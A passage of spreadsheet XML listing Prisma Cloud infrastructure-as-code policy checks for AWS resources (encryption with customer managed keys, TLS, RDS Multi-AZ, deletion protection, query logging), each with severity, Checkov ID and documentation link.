      <c r="AJ728" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK728" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" t="inlineStr"/>
      <c r="B729" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C729" s="2" t="inlineStr"/>
      <c r="D729" t="inlineStr"/>
      <c r="E729" t="inlineStr"/>
      <c r="F729" t="inlineStr"/>
      <c r="G729" t="b">
        <v>1</v>
      </c>
      <c r="H7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29" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J729" t="inlineStr">
        <is>
          <t>IaC:General:aws-connect</t>
        </is>
      </c>
      <c r="K729" t="inlineStr">
        <is>
          <t>The Connect Instance S3 Storage Configuration utilizes Customer Managed Key.</t>
        </is>
      </c>
      <c r="L729" t="inlineStr"/>
      <c r="M729" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N729" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O729" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P729" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q729" t="inlineStr"/>
      <c r="R729" t="inlineStr"/>
      <c r="S729" t="inlineStr"/>
      <c r="T729" t="b">
        <v>0</v>
      </c>
      <c r="U729" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V729" t="inlineStr">
        <is>
          <t>IaC:General:aws-connect-instance-storage-config</t>
        </is>
      </c>
      <c r="W729" t="inlineStr">
        <is>
          <t>Ensure Connect Instance S3 Storage Config uses CMK</t>
        </is>
      </c>
      <c r="X729" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-270</t>
        </is>
      </c>
      <c r="Y729" t="inlineStr"/>
      <c r="Z729" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_connect_instance_storage_config"]}</t>
        </is>
      </c>
      <c r="AA729" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB729" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC729" t="inlineStr">
        <is>
          <t>CKV_AWS_270</t>
        </is>
      </c>
      <c r="AD729" t="b">
        <v>1</v>
      </c>
      <c r="AE729" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF729" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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29" t="inlineStr">
        <is>
          <t>cf6967e2-c450-4d5a-aa84-86d68ca68930</t>
        </is>
      </c>
      <c r="AI729" t="inlineStr"/>
      <c r="AJ729" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK729" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" t="inlineStr"/>
      <c r="B730" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C730" s="2" t="inlineStr"/>
      <c r="D730" t="inlineStr"/>
      <c r="E730" t="inlineStr"/>
      <c r="F730" t="inlineStr"/>
      <c r="G730" t="b">
        <v>1</v>
      </c>
      <c r="H7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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J730" t="inlineStr">
        <is>
          <t>IaC:General:aws-connect</t>
        </is>
      </c>
      <c r="K730" t="inlineStr">
        <is>
          <t>Connect Instance Kinesis Video Stream Storage Config is not using CMK for encryption</t>
        </is>
      </c>
      <c r="L730" t="inlineStr"/>
      <c r="M730" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N730" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O730" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P730" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q730" t="inlineStr"/>
      <c r="R730" t="inlineStr"/>
      <c r="S730" t="inlineStr"/>
      <c r="T730" t="b">
        <v>0</v>
      </c>
      <c r="U730" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V730" t="inlineStr">
        <is>
          <t>IaC:General:aws-connect-instance-storage-config</t>
        </is>
      </c>
      <c r="W730" t="inlineStr">
        <is>
          <t>Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK</t>
        </is>
      </c>
      <c r="X730" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-269</t>
        </is>
      </c>
      <c r="Y730" t="inlineStr"/>
      <c r="Z730" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_connect_instance_storage_config"]}</t>
        </is>
      </c>
      <c r="AA730" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB730" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC730" t="inlineStr">
        <is>
          <t>CKV_AWS_269</t>
        </is>
      </c>
      <c r="AD730" t="b">
        <v>1</v>
      </c>
      <c r="AE730" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF730" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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0" t="inlineStr">
        <is>
          <t>e435fe0d-9592-4fd5-a4a7-11148c55f2d5</t>
        </is>
      </c>
      <c r="AI730" t="inlineStr"/>
      <c r="AJ730" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK730" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" t="inlineStr"/>
      <c r="B731" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C731" s="2" t="inlineStr"/>
      <c r="D731" t="inlineStr"/>
      <c r="E731" t="inlineStr"/>
      <c r="F731" t="inlineStr"/>
      <c r="G731" t="b">
        <v>1</v>
      </c>
      <c r="H7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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J731" t="inlineStr">
        <is>
          <t>IaC:General:aws-datasync-location</t>
        </is>
      </c>
      <c r="K731" t="inlineStr">
        <is>
          <t>DataSync Location Object Storage exposes secrets</t>
        </is>
      </c>
      <c r="L731" t="inlineStr"/>
      <c r="M731" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N731" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O731" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P731" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q731" t="inlineStr"/>
      <c r="R731" t="inlineStr"/>
      <c r="S731" t="inlineStr"/>
      <c r="T731" t="b">
        <v>0</v>
      </c>
      <c r="U731" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V731" t="inlineStr">
        <is>
          <t>IaC:General:aws-datasync-location-object-storage</t>
        </is>
      </c>
      <c r="W731" t="inlineStr">
        <is>
          <t>Ensure DataSync Location Object Storage doesn't expose secrets</t>
        </is>
      </c>
      <c r="X731" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-295</t>
        </is>
      </c>
      <c r="Y731" t="inlineStr"/>
      <c r="Z731" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_datasync_location_object_storage"]}</t>
        </is>
      </c>
      <c r="AA731" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB731" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC731" t="inlineStr">
        <is>
          <t>CKV_AWS_295</t>
        </is>
      </c>
      <c r="AD731" t="b">
        <v>1</v>
      </c>
      <c r="AE731" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF731" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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1" t="inlineStr">
        <is>
          <t>e3bc9262-550f-47f6-96f7-db4bc8f81382</t>
        </is>
      </c>
      <c r="AI731" t="inlineStr"/>
      <c r="AJ731" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK731" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" t="inlineStr"/>
      <c r="B732" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C732" s="2" t="inlineStr"/>
      <c r="D732" t="inlineStr"/>
      <c r="E732" t="inlineStr"/>
      <c r="F732" t="inlineStr"/>
      <c r="G732" t="b">
        <v>1</v>
      </c>
      <c r="H7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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J732" t="inlineStr">
        <is>
          <t>IaC:General:aws-dax</t>
        </is>
      </c>
      <c r="K732" t="inlineStr">
        <is>
          <t>AWS DAX cluster endpoint does not use TLS (Transport Layer Security)</t>
        </is>
      </c>
      <c r="L732" t="inlineStr"/>
      <c r="M732" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N732" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O732" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P732" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q732" t="inlineStr"/>
      <c r="R732" t="inlineStr"/>
      <c r="S732" t="inlineStr"/>
      <c r="T732" t="b">
        <v>0</v>
      </c>
      <c r="U732" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V732" t="inlineStr">
        <is>
          <t>IaC:General:aws-dax-cluster</t>
        </is>
      </c>
      <c r="W732" t="inlineStr">
        <is>
          <t>Ensure DAX cluster endpoint is using TLS</t>
        </is>
      </c>
      <c r="X732" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-dax-cluster-endpoint-uses-transport-layer-security-tls</t>
        </is>
      </c>
      <c r="Y732" t="inlineStr"/>
      <c r="Z732" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_dax_cluster"]}</t>
        </is>
      </c>
      <c r="AA732" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB732" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC732" t="inlineStr">
        <is>
          <t>CKV_AWS_239</t>
        </is>
      </c>
      <c r="AD732" t="b">
        <v>1</v>
      </c>
      <c r="AE732" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF732" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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2" t="inlineStr">
        <is>
          <t>516c4493-8743-400d-9f8e-83f595f2e332</t>
        </is>
      </c>
      <c r="AI732" t="inlineStr"/>
      <c r="AJ732" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK732" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" t="inlineStr"/>
      <c r="B733" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C733" s="2" t="inlineStr"/>
      <c r="D733" t="inlineStr"/>
      <c r="E733" t="inlineStr"/>
      <c r="F733" t="inlineStr"/>
      <c r="G733" t="b">
        <v>1</v>
      </c>
      <c r="H7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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J733" t="inlineStr">
        <is>
          <t>IaC:General:aws-db</t>
        </is>
      </c>
      <c r="K733" t="inlineStr">
        <is>
          <t>RDS instances do not have Multi-AZ enabled</t>
        </is>
      </c>
      <c r="L733" t="inlineStr"/>
      <c r="M733" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N733" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O733" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P733" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q733" t="inlineStr"/>
      <c r="R733" t="inlineStr"/>
      <c r="S733" t="inlineStr"/>
      <c r="T733" t="b">
        <v>0</v>
      </c>
      <c r="U733" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V733" t="inlineStr">
        <is>
          <t>IaC:General:aws-db-instance</t>
        </is>
      </c>
      <c r="W733" t="inlineStr">
        <is>
          <t>Ensure that RDS instances have Multi-AZ enabled</t>
        </is>
      </c>
      <c r="X733" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-73</t>
        </is>
      </c>
      <c r="Y733" t="inlineStr"/>
      <c r="Z733" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_db_instance"]}</t>
        </is>
      </c>
      <c r="AA733" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB733" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC733" t="inlineStr">
        <is>
          <t>CKV_AWS_157</t>
        </is>
      </c>
      <c r="AD733" t="b">
        <v>1</v>
      </c>
      <c r="AE733" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF733" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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3" t="inlineStr">
        <is>
          <t>a846ac6b-0606-4d1f-993d-622f8e5e2ad6</t>
        </is>
      </c>
      <c r="AI733" t="inlineStr"/>
      <c r="AJ733" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK733" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" t="inlineStr"/>
      <c r="B734" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C734" s="2" t="inlineStr"/>
      <c r="D734" t="inlineStr"/>
      <c r="E734" t="inlineStr"/>
      <c r="F734" t="inlineStr"/>
      <c r="G734" t="b">
        <v>1</v>
      </c>
      <c r="H7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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J734" t="inlineStr">
        <is>
          <t>IaC:General:aws-db</t>
        </is>
      </c>
      <c r="K734" t="inlineStr">
        <is>
          <t>AWS RDS does not use a modern CaCert</t>
        </is>
      </c>
      <c r="L734" t="inlineStr"/>
      <c r="M734" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N734" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O734" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P734" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q734" t="inlineStr"/>
      <c r="R734" t="inlineStr"/>
      <c r="S734" t="inlineStr"/>
      <c r="T734" t="b">
        <v>0</v>
      </c>
      <c r="U734" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V734" t="inlineStr">
        <is>
          <t>IaC:General:aws-db-instance</t>
        </is>
      </c>
      <c r="W734" t="inlineStr">
        <is>
          <t>Ensure RDS uses a modern CaCert</t>
        </is>
      </c>
      <c r="X734" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-uses-a-modern-cacert</t>
        </is>
      </c>
      <c r="Y734" t="inlineStr"/>
      <c r="Z734" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_db_instance"]}</t>
        </is>
      </c>
      <c r="AA734" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB734" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC734" t="inlineStr">
        <is>
          <t>CKV_AWS_211</t>
        </is>
      </c>
      <c r="AD734" t="b">
        <v>1</v>
      </c>
      <c r="AE734" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF734" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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4" t="inlineStr">
        <is>
          <t>008fd8a9-4766-4cc3-a8d4-006d4c0340da</t>
        </is>
      </c>
      <c r="AI734" t="inlineStr"/>
      <c r="AJ734" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK734" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" t="inlineStr"/>
      <c r="B735" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C735" s="2" t="inlineStr"/>
      <c r="D735" t="inlineStr"/>
      <c r="E735" t="inlineStr"/>
      <c r="F735" t="inlineStr"/>
      <c r="G735" t="b">
        <v>1</v>
      </c>
      <c r="H7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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J735" t="inlineStr">
        <is>
          <t>IaC:General:aws-db</t>
        </is>
      </c>
      <c r="K735" t="inlineStr">
        <is>
          <t>AWS database instances do not have deletion protection enabled</t>
        </is>
      </c>
      <c r="L735" t="inlineStr"/>
      <c r="M735" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N735" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O735" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P735" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q735" t="inlineStr"/>
      <c r="R735" t="inlineStr"/>
      <c r="S735" t="inlineStr"/>
      <c r="T735" t="b">
        <v>0</v>
      </c>
      <c r="U735" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V735" t="inlineStr">
        <is>
          <t>IaC:General:aws-db-instance</t>
        </is>
      </c>
      <c r="W735" t="inlineStr">
        <is>
          <t>Ensure that AWS database instances have deletion protection enabled</t>
        </is>
      </c>
      <c r="X735" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-293</t>
        </is>
      </c>
      <c r="Y735" t="inlineStr"/>
      <c r="Z735" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_db_instance"]}</t>
        </is>
      </c>
      <c r="AA735" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB735" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC735" t="inlineStr">
        <is>
          <t>CKV_AWS_293</t>
        </is>
      </c>
      <c r="AD735" t="b">
        <v>1</v>
      </c>
      <c r="AE735" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF735" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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5" t="inlineStr">
        <is>
          <t>f94b78fe-3f22-4fde-8cab-add308c6cb23</t>
        </is>
      </c>
      <c r="AI735" t="inlineStr"/>
      <c r="AJ735" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK735" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" t="inlineStr"/>
      <c r="B736" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C736" s="2" t="inlineStr"/>
      <c r="D736" t="inlineStr"/>
      <c r="E736" t="inlineStr"/>
      <c r="F736" t="inlineStr"/>
      <c r="G736" t="b">
        <v>1</v>
      </c>
      <c r="H7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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J736" t="inlineStr">
        <is>
          <t>IaC:General:aws-db</t>
        </is>
      </c>
      <c r="K736" t="inlineStr">
        <is>
          <t>AWS Postgres RDS have Query Logging disabled</t>
        </is>
      </c>
      <c r="L736" t="inlineStr"/>
      <c r="M736" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N736" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O736" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P736" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q736" t="inlineStr"/>
      <c r="R736" t="inlineStr"/>
      <c r="S736" t="inlineStr"/>
      <c r="T736" t="b">
        <v>0</v>
      </c>
      <c r="U736" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V736" t="inlineStr">
        <is>
          <t>IaC:General:aws-db-instance,aws-db-parameter-group</t>
        </is>
      </c>
      <c r="W736" t="inlineStr">
        <is>
          <t>Ensure Postgres RDS as aws_db_instance has Query Logging enabled</t>
        </is>
      </c>
      <c r="X736" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-postgres-rds-has-query-logging-enabled</t>
        </is>
      </c>
      <c r="Y736" t="inlineStr"/>
      <c r="Z736" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_db_instance","aws_db_parameter_group"]}</t>
        </is>
      </c>
      <c r="AA736" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB736" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC736" t="inlineStr">
        <is>
          <t>CKV2_AWS_30</t>
        </is>
      </c>
      <c r="AD736" t="b">
        <v>1</v>
      </c>
      <c r="AE736" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF736" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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6" t="inlineStr">
        <is>
          <t>a31de650-cada-4311-97c9-460f7d48e9e7</t>
        </is>
      </c>
      <c r="AI736" t="inlineStr"/>
      <c r="AJ736" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK736" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" t="inlineStr"/>
      <c r="B737" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C737" s="2" t="inlineStr"/>
      <c r="D737" t="inlineStr"/>
      <c r="E737" t="inlineStr"/>
      <c r="F737" t="inlineStr"/>
      <c r="G737" t="b">
        <v>1</v>
      </c>
      <c r="H7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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J737" t="inlineStr">
        <is>
          <t>IaC:General:aws-db</t>
        </is>
      </c>
      <c r="K737" t="inlineStr">
        <is>
          <t>AWS replicated backups are not encrypted at rest by Key Management Service (KMS) using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L737" t="inlineStr"/>
      <c r="M737" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N737" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O737" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P737" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q737" t="inlineStr"/>
      <c r="R737" t="inlineStr"/>
      <c r="S737" t="inlineStr"/>
      <c r="T737" t="b">
        <v>0</v>
      </c>
      <c r="U737" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V737" t="inlineStr">
        <is>
          <t>IaC:General:aws-db-instance-automated-backups-replication</t>
        </is>
      </c>
      <c r="W737" t="inlineStr">
        <is>
          <t>Ensure replicated backups are encrypted at rest using KMS CMKs</t>
        </is>
      </c>
      <c r="X737" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-replicated-backups-are-encrypted-at-rest-by-key-management-service-kms-using-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y737" t="inlineStr"/>
      <c r="Z737" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_db_instance_automated_backups_replication"]}</t>
        </is>
      </c>
      <c r="AA737" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB737" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC737" t="inlineStr">
        <is>
          <t>CKV_AWS_245</t>
        </is>
      </c>
      <c r="AD737" t="b">
        <v>1</v>
      </c>
      <c r="AE737" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF737" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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7" t="inlineStr">
        <is>
          <t>f7e759b2-f20e-44cd-bfd9-f94fb6a24210</t>
        </is>
      </c>
      <c r="AI737" t="inlineStr"/>
      <c r="AJ737" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK737" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" t="inlineStr"/>
      <c r="B738" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C738" s="2" t="inlineStr"/>
      <c r="D738" t="inlineStr"/>
      <c r="E738" t="inlineStr"/>
      <c r="F738" t="inlineStr"/>
      <c r="G738" t="b">
        <v>1</v>
      </c>
      <c r="H7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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J738" t="inlineStr">
        <is>
          <t>IaC:General:aws-db</t>
        </is>
      </c>
      <c r="K738" t="inlineStr">
        <is>
          <t>AWS RDS DB snapshot does not use Customer Managed Keys (CMKs)</t>
        </is>
      </c>
      <c r="L738" t="inlineStr"/>
      <c r="M738" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N738" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O738" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P738" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q738" t="inlineStr"/>
      <c r="R738" t="inlineStr"/>
      <c r="S738" t="inlineStr"/>
      <c r="T738" t="b">
        <v>0</v>
      </c>
      <c r="U738" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V738" t="inlineStr">
        <is>
          <t>IaC:General:aws-db-snapshot-copy</t>
        </is>
      </c>
      <c r="W738" t="inlineStr">
        <is>
          <t>Ensure App Flow connector profile uses CMK</t>
        </is>
      </c>
      <c r="X738" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-db-snapshot-uses-customer-managed-keys-cmks</t>
        </is>
      </c>
      <c r="Y738" t="inlineStr"/>
      <c r="Z738" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_db_snapshot_copy"]}</t>
        </is>
      </c>
      <c r="AA738" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB738" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC738" t="inlineStr">
        <is>
          <t>CKV_AWS_266</t>
        </is>
      </c>
      <c r="AD738" t="b">
        <v>1</v>
      </c>
      <c r="AE738" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF738" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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8" t="inlineStr">
        <is>
          <t>bf81d0e5-01d4-4372-a1d4-9a124e8f366d</t>
        </is>
      </c>
      <c r="AI738" t="inlineStr"/>
      <c r="AJ738" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK738" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" t="inlineStr"/>
      <c r="B739" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C739" s="2" t="inlineStr"/>
      <c r="D739" t="inlineStr"/>
      <c r="E739" t="inlineStr"/>
      <c r="F739" t="inlineStr"/>
      <c r="G739" t="b">
        <v>1</v>
      </c>
      <c r="H7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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J739" t="inlineStr">
        <is>
          <t>IaC:General:aws-dlm</t>
        </is>
      </c>
      <c r="K739" t="inlineStr">
        <is>
          <t>AWS DLM cross-region events are not encrypted with a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L739" t="inlineStr"/>
      <c r="M739" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
